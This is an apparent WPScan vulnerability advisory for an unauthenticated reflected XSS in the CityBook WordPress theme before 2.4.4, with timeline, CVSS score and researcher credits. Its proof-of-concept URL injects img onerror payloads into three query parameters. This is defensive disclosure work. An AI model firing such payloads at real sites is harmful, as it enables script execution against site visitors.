CityBook < 2.4.4 – Unauthenticated Reflected XSS

Description

Unauthenticated Reflected XSS vulnerability was discovered in the «CityBook - Directory & Listing WordPress Theme», tested version — v2.4.3.

Edit (WPScanTeam)
June 17th, 2020 - Confirmed & Escalated to Envato
June 18th, 2020 - v2.4.4 released, fixing the issue

Proof of Concept

https://example.com/?search_term=&distance=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS`)%3E&nearby=&address_lat=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS2`)%3E&address_lng=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS3`)%3E&lcats[]=47

Affects Themes

citybook

Fixed in 2.4.4

References

URL

https://m0ze.ru/vulnerability/[2020-06-17]-[WordPress]-[CWE-79]-CityBook-WordPress-Theme-v2.4.3.txt

URL

https://themeforest.net/item/citybook-directory-listing-wordpress-theme/21694727

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

CVSS

8.3 (high)

Miscellaneous

Original Researcher

Vlad Vector

Submitter

VLΛD VΞCTOR

Submitter website

https://vladvector.ru

Submitter twitter

vlad_vector

Verified

Yes

WPVDB ID

e814b9f4-21ff-4586-ae57-022f74d6f133

Timeline

Publicly Published

2020-06-19 (about 3 years ago)

Added

2020-06-19 (about 3 years ago)

Last Updated

2021-05-30 (about 2 years ago)

Other

Published

Title

Published

2014-04-28

Title

Keyword Strategy Internal Links <= 2.0 - XSS

Published

2023-10-29

Title

Shortcode Menu <= 3.2 - Contributor+ Stored Cross-Site Scripting

Published

2016-03-11

Title

DW Question & Answer <= 1.4.2.2 - Stored Cross-Site Scripting (XSS)

Published

2024-04-29

Title

AJAX Login and Registration modal popup + inline form <= 2.23 - Authenticated (Author+) Stored Cross-Site Scripting

Published

2023-04-18

Title

TaxoPress < 3.6.5 - Editor+ Stored XSS